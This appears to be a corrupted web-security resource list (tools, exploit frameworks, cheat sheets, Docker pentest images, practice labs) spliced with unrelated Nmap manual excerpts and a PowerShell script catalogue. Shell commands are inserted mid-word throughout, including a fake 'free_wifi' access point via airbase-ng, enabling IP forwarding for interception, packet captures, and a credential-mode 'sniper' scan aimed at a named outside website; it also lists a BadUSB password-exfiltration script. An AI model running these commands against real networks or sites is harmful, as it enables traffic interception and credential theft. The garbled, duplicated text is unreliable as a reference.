https://www.manning.com/books/making-sense-of-cyber-security - A guide to the key concepts, terminology, and technologies of cybersecurity perfect for anyone planning or implementing a security strategy.
https://www.manning.com/books/cyber-security-career-guide - Kickstart a career in cyber security by learning how to adapt your existing technical and non-technical skills.
https://www.manning.com/books/secret-key-cryptography - A book about cryptographic techniques and Secret Key methods.
https://www.manning.com/books/application-security-program-handbook - This practical book is a one-stop guide to implementing a robust application security program.
https://www.manning.com/books/cyber-threat-hunting - Practical guide to cyber threat hunting.
https://nostarch.com/bug-bounty-bootcamp - Bug Bounty Bootcamp
https://nostarch.com/hacking-apis - Hacking APIs
https://www.manning.com/books/grokking-web-application-security - A book about building web apps that are ready for and resilient to any attack.

Documentation

systemctl list-units --all

https://www.owasp.org/ - Open Web Application Security Project
http://www.pentest-standard.org/ - Penetration Testing Execution Standard
http://www.binary-auditing.com/ - Dr. Thorsten Schneider’s Binary Auditing
https://appsecwiki.com/ - Application Security Wiki is an initiative to provide all Application security related resources to Security Researchers and developers at one place.

Tools

$ sudo tcpdump -i eth0 host 192.168.1.10 -w host_traffic.pcap

https://www.deepinfo.com/ - Deepinfo Attack Surface Platsudo iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort form discovers all your digital assets, monitors them 24/7, detects any issues, and notifies you quickly so you can take immediate action.
https://spyse.com/ - OSINT search engine that provides fresh data about the entire web, storing all data in its own DB, interconnect finding data and has some cool features.
http://www.metasploit.com/ - World's most used penetration testing software
https://findsubdomains.com - Online subdomains pyscanner service with lots of additional data. works using OSINT.
https://github.com/bjeborn/basic-auth-pot HTTP Basic Authentication honeyPot.
http://www.arachni-scanner.com/ - Web Application Security Scanner Framework
https://github.com/sullo/nikto - Nikto web server scanner
http://www.tenable.com/products/nessus-vulnerability-scanner - Nessus Vulnerability Scanner
http://www.portswigger.net/burp/intruder.html - Burp Intruder is a tool for automating customized attacks against web apps.
http://www.openvas.org/ - The world's most advanced Open Source vulnerability scanner and manager.
https://github.com/iSECPartners/Scout2 - Security auditing tool for AWS environments
https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project - Is a multi threaded java application designed to brute force directories and files names on web/application servers.
https://www.owasp.org/index.php/ZAP - The Zed Attack Proxy is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
https://github.com/tecknicaltom/dsniff - dsniff is a collection of tools for network auditing and penetration t└─$ sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward' esting.
https://github.com/WangYihang/Webshell-Sniper - Manage your webshell via terminal.
https://github.com/DanMcInerney/dnsspoof - DNS spoofer. Drops DNS resp690339onses from the router and replaces it with the spoofed DNS response
https://github.com/trustedsec/social-engineer-toolkit - The Social-Engineer Toolkit (SET) repository from TrustedSec
https://github.com/sqlmapproject/sqlmap - Automatic SQL injection and database takeover tool
https://github.com/beefproject/beef - The Browser Exploitation Framework Project
http://w3af.org/ - w3af is a Web Application Attack and Audit Framework
https://github.com/espreto/wpsploit - WPSploit, pyExploiting Wordpress With Metasploit
https://github.com/WangYihang/Reverse-Shell-Manager - Reverse shell manager via terminal.
https://github.com/RUB-NDS/WS-Attacker - WS-Attacker is a modular framework for web services penetration testing
https://github.com/wpscanteam/wpscan - WPScan is a black box WordPress vulnerability scanner
http://sourceforge.net/projects/paros/ Paros proxy
https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project Web Scarab proxy
https://code.google.com/p/skipfish/ Skipfish, an active web application security reconnaissance tool
http://www.acunetix.com/vulnerability-scanner/ Acunetix Web Vulnerability Scanner
https://cystack.net/ CyStack Web Security Platform
http://www-03.ibm.com/software/products/en/appscan IBM Security AppScan
https://www.netsparker.com/web-vulnerability-scanner/ Netsparker web vulnerability scanner
http://www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/index.html HP Web Inspect
https://github.com/sensepost/wikto Wikto - Nikto for Windows with some extra features
http://samurai.inguardians.com Samurai Web Testing Framework
https://code.google.com/p/ratproxy/ Ratproxy
http://www.websecurify.com Websecurify
http://sourceforge.net/projects/grendel/ Grendel-scan
https://tools.kali.org/web-applications/gobuster Directory/file and DNS busting tool written in Go
http://www.edge-securisudo sniper -t https://dedicatedglass.com -m credentials ty.com/wfuzz.php Wfuzz sudo airbase-ng --essid free_wifi -c 11 wlan1mon
http://wapiti.sourceforge.net wapiti
https://github.com/neuroo/grabber Grabber
https://subgraph.com/vega/ Vega690339
http://websecuritsudo iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort ytool.codeplex.com Watcher passive web scanner
http://xss.codeplex.com x5s XSS and Unicode transformations security testing assistant
http://www.beyondsecurity.com/avds AVDS Vulnerability Assessment and Management
http://www.golismero.com Golismero
http://www.ikare-monitoring.com IKare
http://www.nstalker.com N-St -sV (Version detection)

Enables version detection, as discussed above. Alternatively, you can use -A, which enables version detection among other things.

-sR is an alias for -sV. Prior to March 2011, it was used to active the RPC grinder separately from version detection, but now these options are always combined.

--allports (Don't exclude any ports from version detection)

By default, Nmap version detection skips TCP port 9100 because some printers simply print anything sent to that port, leading to dozens of pages of HTTP GET requests, binary SSL session requests, etc. This behavior can be changed by modifying or removing the Exclude directive in nmap-service-probes, or you can specify --allports to scan all ports regardless of any Exclude directive.

--version-intensity (Set version scan intensity)

When performing a version scan (-sV), Nmap sends a series of probes, each of which is assigned a rarity value between one and nine. The lower-numbered probes are effective against a wide variety of common services, while the higher-numbered ones are rarely useful. The intensity level specifies which probes should be applied. The higher the number, the more likely it is the service will be correctly identified. However, high intensity scans take longer. The intensity must be between 0 and 9. The default is 7. When a probe is registered to the target port via the nmap-service-probes ports directive, that probe is tried regardless of intensity level. This ensures that the DNS probes will always be attempted against any open portcpdump -s 0 port ftp or ssh -i eth0 -w mycap.pcapt 53, the SSL probe will be done against 443, etc.

--version-light (Enable light mode) [NMAP BASIC -- HOST DISCOVERY ] -------------------------

-sL [NMAP- List subnet witho
This is a convenience alias for --version-intensity 2. This light mode makes version scanning much faster, but it is slightly less likely to identify services.

--version-all (Try every single probe)

An alias for --version-intensity 9, ensuring that every single probe is attempted against each port.

--version-trace (Trace version scan activity) └─$ sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

alker Xsudo enum4linux localhost

https://www.rapid7.com/products/nexpose/index.jsp Nexpose
http://www.rapid7.com/products/appspider/ App Spider
http://www.milescan.com ParosPro
https://www.qualys.com/enterprises/qualysguard/web-application-scanning/ Qualys Web Application Scanning
http://www.beyondtrust.com/Products/RetinaNetworkSecurityScanner/ Retina
https://www.owasp.org/indpyex.php/OWASP_Xenotix_XSS_Exploit_Framework Xenotix XSS Exploit Framework
https://github.com/future-architect/vuls Vulnerability scanner for Linux, agentless, written in golang.
https://github.com/rastating/wordpress-exploit-framework A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
http://www.xss-payloads.com/ XSS Payloads to leverage XSS vulnerabilities, build custom payloads, practice penetration testing skills.
https://github.com/joaomatosf/jexboss JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
https://github.com/commixproject/commix Automated All-in-One OS command injection and exploitation tool
https://github.com/pathetiq/BurpSmartBuster A Burp Suite content discovery plugin that add the smart into the Buster!
https://github.com/GoSecure/csp-auditor Burp and ZAP plugin to analyze CSP headers
https://github.com/ffleming/timing_attack Perform timing attacks against web applications
https://github.com/lalithr95/fuzzapi Fuzzapi is a tool used for REST API pentesting
https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF)
https://github.com/nccgroup/wssip Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa.
https://github.com/PalindromeLabs/STEWS Tool suite for WebSocket discover sudo airbase-ng --essid free_wifi -c 11 wlan1mon y, fingerprinting, and vulnerability detection
https://github.com/tijme/angularjs-csti-scanner Automated client-side template injection (sandbox escape/bypass) detection for AngularJS (ACSTIS).
https://reshift.softwaresecured.com A source code analysis tool for detecting and managing Java security vulnerabilities.
https://encoding.tools Web app for transforming binary data and strings, including hashes and various encodings. GPLv3 offline version available.
https://gchq.github.io/CyberChef/ A "Cyber Swiss Army Knife" for carrying out various encodings and transformations of binary data and strings.
https://github.com/urbanadventurer/WhatWeb WhatWeb - Next generation web scanner
https://www.shodan.io/ Shodan - The search engine for find vulnerable servers
https://github.com/WangYihang/Webshell-Sniper A webshell manager via terminal
https://github.com/nil0x42/phpsploit PhpSploit - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner
https://webhint.io/ - webhint - webhint is a customizable linting tool that helps you improve your site's accessibility, speed, cross-browser compatibility, and more by checking your code for best practices and common errors.
https://gtfobins.github.io/ - gtfobins - GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
https://github.com/HightechSec/git-scanner git-scanner - A tool for bug hunting or pentesting for targeting websites that have open .git repositories available in public
Web Application Exploitation @ Rawsec Inventory - Complete list of Web pentesting tools
Cyclops is a novel browser that can detect vulnerability automatically - Cyclops is a web browser with XSS detection feature
https://caido.io/ - Web proxy└─$ sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
https://github.com/assetnote/kiterunner - API discovery
https://github.com/owasp-amass/amass - domain recon
https://columbus.elmasy.com/ - Columbus Project is an advanced subdomain discovery service with fast, powerful and easy to use API.
BadUSB Script To Exfiltrate Passwords - Extracts all saved passwords from Chrome, Firefox, and Edge to be saved onto secondary USB for further analysis.
https://github.com/flibustier/jwt-online-cracker - Brute-force HS256, HS384 or HS512 JWT Token from your browser (fully client-side).

Cheat Sheets

http://n0p.net/penguicon/php_app_sec/mirror/xss.html - XSS cheatsheet
https://highon.coffee/blog/lfi-cheat-sheet/ - LFI Cheat Sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/ - Reverse Shell Cheat Sheet
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ - SQL Injection Cheat Sheet
https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/ - Path Traversal Cheat Sheet: Windows sudo airbase-ng --essid free_wifi -c 11 wlan1mon

Docker images for Penetration Testing

docker pull kalilinux/kali-linux-docker official Kali Linux
docker pull blackarchlinux/blackarch official BlackArch Linux
docker pull owasp/zap2docker-stable - official OWASP ZAP
docker pull wpscanteam/wpscan - official WPScan
docker pull metasploitframework/metasploit-framework - docker-metasploit
docker pull citizenstig/dvwa - Damn Vulnerable Web Application (DVWA)
docker pull bkimminich/juice-shop OWASP Juice Shop
docker pull wpscanteam/vulnerablewordpress - [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerabl -sV (Version detection)

Enables version detection, as discussed above. Alternatively, you can use -A, which enables version detection among other things.

-sR is an alias for -sV. Prior to March 2011, it was used to active the RPC grinder separately from version detection, but now these options are always combined.

--allports (Don't exclude any ports from version detection)

By default, Nmap version detection skips TCP port 9100 because some printers simply print anything sent to that port, leading to dozens of pages of HTTP GET requests, binary SSL session requests, etc. This behavior can be changed by modifying or removing the Exclude directive in nmap-service-probes, or you can specify --allports to scan all ports regardless of any Exclude directive.

--version-intensity (Set version scan intensity)

When performing a version scan (-sV), Nmap sends a series of probes, each of which is assigned a rarity value between one and nine. The lower-numbered probes are effective against a wide variety of common services, while the higher-numbered ones are rarely useful. The intensity level specifies which probes should be applied. The higher the number, the more likely it is the service will be correctly identified. However, high intensity scans take longer. The intensity must be between 0 and 9. The default is 7. When a probe is registered to the target port via the nmap-service-probes ports directive, that probe is tried regardless of intensity level. This ensures that the DNS probes will always be attempted against any open port 53, the SSL probe will be done against 443, etc.

--version-light (Enable light mode)

This is a convenience alias for --version-intensity 2. This light mode makes version scanning much faster, but it is slightly less likely to identify services.

--version-all (Try every single probe)

An alias for --version-intensity 9, ensuring that every single probe is attempted against each port.

--version-trace (Trace version scan activity)

ewordpress/)

docker pull hmlio/vaas-cve-2014-6271 - Vulnerability as a service: Shellshock
docker pull hmlio/vaas-cve-2014-0160 - Vulnerability as a service: Heartbleed
`doc -sV (Version detection)

Enables version detection, as discussed above. Alternatively, you can use -A, which enables version detection among other things.

-sR is an alias for -sV. Prior to March 2011, it was used to active the RPC grinder separately from version detection, but now these options are always combined.

--allports (Don't exclude any ports from version detection)

By default, Nmap version detection skips TCP port 9100 because some printers simply print anything sent to that port, leading to dozens of pages of HTTP GET requests, binary SSL session requests, etc. This behavior can be changed by modifying or removing the Exclude directive in nmap-service-probes, or you can specify --allports to scan all ports regardless of any Exclude directive.

--version-intensity (Set version scan intensity)

When performing a version scan (-sV), Nmap sends a series of probes, each of which is assigned a rarity value between one and nine. The lower-numbered probes are effective against a wide variety of common services, while the higher-numbered ones are rarely useful. The intensity level specifies which probes should be applied. The higher the number, the more likely it is the service will be correctly identified. However, high intensity scans take longer. The intensity must be between 0 and 9. The default is 7. When a probe is registered to the target port via the nmap-service-probes ports directive, that probe is tried regardless of intensity level. This ensures that the DNS probes will always be attempted against any open port 53, the SSL probe will be done against 443, etc.

--version-light (Enable light mode)

This is a convenience alias for --version-intensity 2. This light mode makes version scanning much faster, but it is slightly less likely to identify services.

--version-all (Try every single probe) [NMAP BASIC -- HOST DISCOVERY ] -------------------------

-sL [NMAP- List subnet witho
An alias for --version-intensity 9, ensuring that every single probe is attempted against each port.

--version-trace (Trace version scan activity)

ker pull opendns/securisudo enum4linux localhostty-ninjas` - Security Ninjas

docker pull noncetonic/archlinux-pentest-lxde:1.0 - Arch Linux Penetration Tester
docker pull diogomonica/docker-bench-security - Docker Bench for Security
docker pull ismisepaul/securityshepherd - OWASP Security Shepherd
docker pull danmx/docker-owasp-webgoat - OWASP WebGoat Project docker image
docker pull docker pull jeroenwillemsen/wrongsecrets - OWASP WrongSecrets Project docker image
docker pull citizenstig/nowasp - OWASP Mutillidae II Web Pen-Test Practice Application
docker pull aaaguirre/pentest - Docker for pentest
docker pull rustsbrowser.capabilities.googlegearscan/rustscan:2.0.0 - The Modern Port Scanner

Vulnerabilities

http://cve.mitre.org/ - Common Vulnerabilities and Exposures. The Standard for Information Security Vulnerability Names
https://www.exploit-db.com/ - The Exploit Database – ultimate archive of Exploits, Shellcode, and Security Papers.
http://0day.today/ - Inj3ct0r is the ultimate database of exploits and vulnerabilities and a great resource for vulnerability researchers and security professionals.
http://www.securityfocus.com/ - Since its inception in 1999, SecurityFocus has been a mainstay in the security community.
http://packetstormsecurity.com/ - Global Security Resource
https://wpvulndb.com/ - WPScan Vulnerability Database
https://snyk.io/vuln/ - Vulnerability DB, Detailed information and remediation guidance for known vulnerabilities.
https://stellastra.com/cipher-suite - Data[NMAP BASIC -- HOST DISCOVERY ] -------------------------

-sL [NMAP- List subnet withobase of hundreds of TLS cipher suites and their security status.

https://vulncheck.com/xdb/ - An index of exploit proof-of-concept code in Git repositories.

Courses

https://pwn.guide/ - Cybersecurity learning platform, with about 100 tutorials, approximately 25 of them are about web hacking & defending websites.
https://www.offensive-security.com/information-security-training/advanced-web-attack-and-exploitation/ Offensive Security Advanced Web Attacks and Exploitation (live)
https://www.sans.org/course/web-app-penetration-testing-ethical-hacking Sans SEC542: Web App Penetration Testing and Ethical Hacking
https://www.sans.org/course/advanced-web-app-penetration-testing-ethical-hacking Sans SEC642: Advanced Web App Penetration Testing and Ethical Hacking
http://opensecuritytraining.info/ - Open Security Training690339
http://securitytrainings.net/security-trainings/ - Security Exploded Training
http://www.securitytube.net/ - World’s largest Infosec and Hacking Portal.
https://www.hacker101.com/ - Free class for web security by Hackerone
https://www.darkrelay.com/courses/professional-penetration-tester - Zero-Hero style Pentesting course by DarkRelay Security Labs

Online Hacking Demonstration Sites

http://testasp.vulnweb.com/ - Acunetix ASP test and demonstration site
http://testaspnet.vulnweb.com/ - Acunetix ASP.Net test and demonstration site
http://testphp.vulnweb.com/ - Acunetix PHP test and demonstration site
http://crackme.cenzic.com/kelev/view/home.php - Crack Me Bank
http://zero.webappsecurity.com/ - Zero Bank
http://demo.testfire.net/ - Altoro Mutual
https://public-firing-range.appspot.com/ - Firing Range is a test bed for automated web application security scanners.
https://xss-game.appspot.com/ - XSS challenge
https://google-gruyere.appspot.com/ Google Gruyere, web application exploits and defenses
https://ginandjuice.shop/catalog
https://pentest-ground.com/ Pentest-Ground is a free playground with deliberately vulnerable web applications and network services.
HackSimulator is a GPT created by MarkCyber in which chatGPT 4 acts as a hacking CTF. This GPT will ask for your experience level and what you would like to improve on, before simulating a machine/application for you to hack into, using the chatbox as the place to input terminal commands. Since this is through AI, it changes and adjust based on your experience level and you can ask for help if you are stuck.

Labs

https://portswigger.net/web-security - Web Security Academy: Free Online Training from PortSwigger
http://www.cis.syr.edu/~wedu/seed/all_labs.html - Developing Instructional Laboratories for Computer SEcurity EDucation
https://www.vulnhub.com/ - Virtual Machines for Localhost Penetration Testing.
https://pentesterlab.com/ - PentesterLab is an easy and great way to learn penetration testing.
https://github.com/jerryhoff/WebGoat.NET - This web application is a learning platform about common web security flaws.
http://www.dvwa.co.uk/ - Damn Vulnerable Web Application (DVWA)
http://sourceforge.net/projects/lampsecurity/ - LAMPSecurity Training
https://github.com/Audi-1/sqli-labs - SQLI labs to test error based, Blind boolean based, Time based.
https://github.com/paralax/lfi-labs - small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns
https://hack.me/ - Build, host and share vulnerable web apps in a sandboxed environment for free
http://azcwr.org/az-cyber-warfare-ranges - Free live fire Capture the Flag, blue team, red team Cyber Warfare Range for beginners through advanced users. Must use a cell phone to send a text message requesting access to the range.
https://github.com/adamdoupe/WackoPicko - WackoPicko is a vulnerable web application used to test web application vulnerability scanners.
https://github.com/rapid7/hackazon - Hackazon is a free, vulnerable test site that is an online storefront built with the same technologies used in today’s rich client and mobile applications.
https://github.com/RhinoSecurityLabs/cloudgoat - Rhino Security Labs' "Vulnerable by Design" AWS infrastructure setup tool
https://www.hackthebox.eu/ - Hack The Box is an online platform allowing you to test and advance your skills in cyber security.
https://github.com/tegal1337/0l4bs - 0l4bs is a Cross-site scripting labs for web application security enthusiasts.
https://github.com/oliverwiegers/pentest_lab - Local pentest lab leveraging docker compose.
https://ginandjuice.shop/catalog
https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application
https://labex.io/skilltrees/cybersecurity - LabEx is an online platform for enhancing your cyber security skills through hands-on labs.
https://pythoncyber.go.ro - CyberPython helps you to make your own research in order to solve challenges, exploit CVEs and make good scripts.

SSL

└─$ sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

https://www.ssllabs.com/ssltest/index.html - This service performs a deep analysis of the configuration of any SSL web server on the public Internet.
http://certdb.com/ - SSL/TLS data provider service. Collect the data about digital certificates - issuers, organisation, whois, expiration dates, etc... Plus, has handy filters for convenience.
https://raymii.org/s/tutorials/Strong_SSL_Security_On_nginx.html - Strong SSL Security on nginx
https://weakdh.org/ - Weak Diffie-Hellman and the Logjam Attack
https://letsencrypt.org/ - Let’s Encrypt is a new Certificate Authority: It’s free, automated, and open.
https://filippo.io/Heartbleed/ - A checker (site and tool) for CVE-2014-0160 (Heartbleed).
https://testssl.sh/ - A command line tool which checks a website's TLS/SSL ciphers, protocols and cryptographic flaws.

Security Ruby on Rails

http://brakemanscanner.org/ - A static analysis security vulnerability scanner for Ruby on Rails applications.
https://github.com/rubysec/ruby-advisory-db - A database of vulnerable Ruby Gems
https://github.com/rubysec/bundler-audit - Patch-level verification for Bundler
https://github.com/hakirisec/hakiri_toolbelt - Hakiri Toolbelt is a command line interface for the Hakiri platform.
https://hakiri.io/facets - Scan Gemfile.lock for vulnerabilities.
http://rails-sqli.org/ - This page lists many query methods and options in ActiveRecord which do not sanitize raw SQL arguments and are not intended to be called with unsafe user input.
https://github.com/0xsauby/yasuo - A ruby script that scans for vulnerable & exploitable 3rd-party web applications on a network

---------------------------------------------------MISC - ADDING BINARY KALI-MENU---------------------------------

Script Description list-voices.ps1 Lists the installed text-to-speech voices. Read more » play-beep-sound.ps1 Plays a short beep sound. More » play-files.ps1 Plays the given audio files. More » play-happy-birthday.ps1 Plays the Happy Birthday song. More » play-imperial-march.ps1 Plays the Imperial March (Star Wars). More » play-jingle-bells.ps1 Plays Jingle Bells. More » play-mission-impossible.ps1 Plays the Mission Impossible theme. More » play-m3u.ps1 Plays the given M3U playlist. More » play-mp3.ps1 Plays the given MP3 sound file. More » play-super-mario.ps1 Plays the Super Mario intro. More » play-tetris-melody.ps1 Plays the Tetris melody. More » speak-checklist.ps1 Speaks the given checklist by text-to-speech. More » speak-countdown.ps1 Speaks a countdown by text-to-speech. More » speak-english.ps1 Speaks text with an English text-to-speech voice. More » speak-epub.ps1 Speaks the content of the given Epub file by text-to-speech. More » speak-file.ps1 Speaks the content of the given text file by text-to-speech. More » speak-french.ps1 Speaks text with a French text-to-speech voice. More » speak-german.ps1 Speaks text with a German text-to-speech voice. More » speak-italian.ps1 Speaks text with an Italian text-to-speech voice. More » speak-spanish.ps1 Speaks text with a Spanish text-to-speech voice. More » speak-test.ps1 Performs a speak test by text-to-speech. More » speak-text.ps1 Speaks the given text by text-to-speech. More » spell-word.ps1 Spells the given word by text-to-speech. More » tell-joke.ps1 Tells a random joke by text-to-speech. More » tell-quote.ps1 Tells a random quote by text-to-speech. More » turn-volume-down.ps1 Turns the audio volume down. More » turn-volume-fully-up.ps1 Turns the audio fully up. More » turn-volume-off.ps1 Turns audio off. More » turn-volume-on.ps1 Turns audio on. More » turn-volume-up.ps1 Turns the audio volume up. More » ⚙️ Scripts to Manage Computers Script Description add-firewall-rules.ps1 Adds firewall rules for executables, needs admin rights. Read more » check-cpu.ps1 Checks the CPU temperature. More » check-dns.ps1 Checks the DNS resolution. More » check-drive-space.ps1 Checks a drive for free space left. More » check-file-system.ps1 Checks the file system of a drive (needs admin rights). More » check-health.ps1 Checks the system health. More » check-ping.ps1 Checks the ping latency to the internet. More » check-swap-space.ps1 Checks the swap space for free space left. More » check-windows-system-files.ps1 Checks Windows system files (needs admin rights). More » enable-crash-dumps.ps1 Enables the writing of crash dumps. More » hibernate.ps1 Hibernates the local computer immediately. More » install-github-cli.ps1 Installs GitHub CLI. More » install-chrome-browser.ps1 Installs the Google Chrome browser. More » install-firefox.ps1 Installs the Firefox browser. More » install-knot-resolver.ps1 Installs the Knot Resolver (needs admin rights). More » install-ssh-client.ps1 Installs a SSH client (needs admin rights). More » install-ssh-server.ps1 Installs a SSH server (needs admin rights). More » install-signal-cli.ps1 Installs the CLI edition of the Signal messenger. More » install-updates.ps1 Installs updates (need admin rights). More » install-wsl.ps1 Installs Windows Subsystem for Linux (WSL), needs admin rights. More » list-apps.ps1 Lists the installed applications. More » list-cli-tools.ps1 Lists installed command-line interface (CLI) tools. More » list-dns-servers.ps1 Lists public DNS servers. More » list-drives.ps1 Lists all drives. More » list-network-shares.ps1 Lists all network shares of the local computer. More » list-installed-software.ps1 Lists the installed software. More » list-printers.ps1 Lists all printer known to the computer. More » list-print-jobs.ps1 Lists all jobs of all printers. More » list-processes.ps1 Lists the local computer processes. More » list-services.ps1 Lists the services on the local computer. More » list-system-info.ps1 Lists system information on the local computer. More » list-tasks.ps1 Lists all Windows scheduler tasks. More » list-timezone.ps1 Lists the current time zone details. More » list-timezones.ps1 Lists all time zones available. More » list-user-groups.ps1 Lists the user groups on the local computer. More » poweroff.ps1 Halts the local computer (needs admin rights). More » query-smart-data.ps1 Queries the S.M.A.R.T. data of your HDD/SSD's. More » reboot.ps1 Reboots the local computer (needs admin rights). More » remove-print-jobs.ps1 Removes all jobs from all printers. More » restart-network-adapters.ps1 Restarts all local network adapters. More » upgrade-ubuntu.ps1 Upgrades Ubuntu Linux to the latest (LTS) release. More » wake-up-host.ps1 Wakes up a computer using Wake-on-LAN. More » windefender.ps1 Turn Windows Defender on/off/check real time monitoring. More » 💻 Scripts for the Desktop Script Description close-calculator.ps1 Closes the calculator application. Read more » close-cortana.ps1 Closes Cortana. More » close-chrome.ps1 Closes the Google Chrome browser. More » close-program.ps1 Closes the given program gracefully. More » close-edge.ps1 Closes the Edge browser. More » close-file-explorer.ps1 Closes Microsoft File Explorer. More » close-firefox.ps1 Closes the Firefox browser. More » close-microsoft-store.ps1 Closes the Microsoft Store app. More » close-netflix.ps1 Closes the Netflix app. More » close-onedrive.ps1 Closes Microsoft OneDrive. More » close-serenade.ps1 Closes the Serenade application. More » close-snipping-tool.ps1 Closes the Snipping Tool application. More » close-spotify.ps1 Closes Spotify. More » close-system-settings.ps1 Closes the System Settings window. More » close-task-manager.ps1 Closes the Task Manager. More » close-thunderbird.ps1 Closes Mozilla Thunderbird. More » close-vlc.ps1 Closes the VLC media player application. More » close-windows-terminal.ps1 Closes the Windows Terminal application. More » enable-god-mode.ps1 Enables the god mode (adds a new icon to the desktop). More » install-chrome.ps1 Installs the Google Chrome browser. Read more... install-firefox.ps1 Installs the Firefox browser. Read more... list-clipboard.ps1 Lists the contents of the clipboard. Read more... new-email.ps1 Starts the default email client to write a new email. Read more... open-amazon-website.ps1 Opens Amazon's website. Read more... open-default-browser.ps1 Launches the default Web browser. Read more... open-calculator.ps1 Starts the calculator program. Read more... open-c-drive.ps1 Opens the C: drive folder. Read more... open-downloads-folders.ps1 Opens the user's downloads folder. Read more... open-dropbox-folder.ps1 Opens the user's Dropbox folder. Read more... open-edge.ps1 Launches the Edge browser. Read more... open-email-client.ps1 Starts the default email client. Read more... open-facebook-website.ps1 Opens Facebook's website. Read more... open-file-explorer.ps1 Opens the File Explorer. Read more... open-firefox.ps1 Launches the Firefox browser. Read more... open-fritz-box.ps1 Opens FRITZ!Box's web interface. Read more... open-github.ps1 Opens GitHub's website. Read more... open-google-contacts.ps1 Opens Google Contacts. Read more... open-google-earth.ps1 Opens Google Earth. Read more... open-google-mail.ps1 Opens Google Mail. Read more... open-google-maps.ps1 Opens Google Maps. Read more... open-google-news.ps1 Opens Google News. Read more... open-google-play.ps1 Opens Google Play. Read more... open-google-search.ps1 Opens Google Search. Read more... open-google-translate.ps1 Opens Google Translate. Read more... open-home-folder.ps1 Opens the user's home folder. Read more... open-music-folder.ps1 Opens the user's music folder. Read more... open-netflix.ps1 Starts the Netflix app. Read more... open-microsoft-store.ps1 Launches the Microsoft Store app. Read more... open-notepad.ps1 Starts the Notepad app. Read more... open-onedrive-folder.ps1 Opens the user's OneDrive folder. Read more... open-pictures-folder.ps1 Opens the user's pictures folder. Read more... open-recycle-bin.ps1 Opens the user's recycle bin folder. Read more... open-repos-folder.ps1 Opens the user's Git repositories folder. Read more... open-snipping-tool.ps1 Starts the Snipping Tool. Read more... open-speed-test.ps1 Opens Cloudflare's speed test. Read more... open-spotify.ps1 Opens Spotify. Read more... open-system-settings.ps1 Opens the system settings of Windows. Read more... open-task-manager.ps1 Starts the Task Manager. Read more... open-videos-folder.ps1 Opens the user's videos folder. Read more... open-windows-terminal.ps1 Launches Windows Terminal. Read more... open-wikipedia-website.ps1 Opens Wikipedia's website. Read more... open-youtube-website.ps1 Opens YouTube's website. Read more... remind-me.ps1 Creates a scheduled task that will display a popup message. Read more... save-screenshot.ps1 Saves a single screenshot. Read more... set-wallpaper.ps1 Sets the given image as wallpaper. Read more... 📁 Scripts for Files & Folders Script Description cd-autostart.ps1 Set the working directory to the user's autostart folder. Read more » cd-desktop.ps1 Set the working directory to the user's desktop folder. More » cd-docs.ps1 Set the working directory to the user's documents folder. More » cd-downloads.ps1 Set the working directory to the user's downloads folder. More » cd-dropbox.ps1 Set the working directory to the user's Dropbox folder. More » cd-home.ps1 Set the working directory to the user's home folder. More » cd-music.ps1 Set the working directory to the user's music folder. Read more... cd-onedrive.ps1 Set the working directory to the user's OneDrive folder. Read more... cd-pics.ps1 Set the working directory to the user's pictures folder. Read more... cd-recycle-bin.ps1 Set the working directory to the user's recycle bin folder. Read more... cd-repos.ps1 Change the working directory to the user's Git repositories folder. Read more... cd-repo.ps1 Change the working directory to the given Git repository folder. Read more... cd-root.ps1 Set the working directory to the root directory. Read more... cd-scripts.ps1 Set the working directory to the PowerShell Scripts folder. Read more... cd-ssh.ps1 Set the working directory to the user's SSH folder. Read more... cd-up.ps1 Set the working directory to one directory level up. Read more... cd-up2.ps1 Set the working directory to two directory levels up. Read more... cd-up3.ps1 Set the working directory to three directory levels up. Read more... cd-up4.ps1 Set the working directory to four directory levels up. Read more... cd-videos.ps1 Set the working directory to the user's videos folder. Read more... check-symlinks.ps1 Checks every symlink in a directory tree. Read more... check-xml-file.ps1 Checks the given XML file for validity. Read more... clear-recycle-bin.ps1 Removes the content of the recycle bin folder (can not be undo!). Read more... copy-photos-sorted.ps1 Copy image files sorted by year and month. Read more... decrypt-file.ps1 Decrypts the given file. Read more... download-dir.ps1 Downloads a directory tree from the given URL. Read more... download-file.ps1 Downloads a file from the given URL. Read more... edit.ps1 Edits the given file with the built-in text editor. Read more... encrypt-file.ps1 Encrypts the given file. Read more... get-md5.ps1 Prints the MD5 checksum of the given file. Read more... get-sha1.ps1 Prints the SHA1 checksum 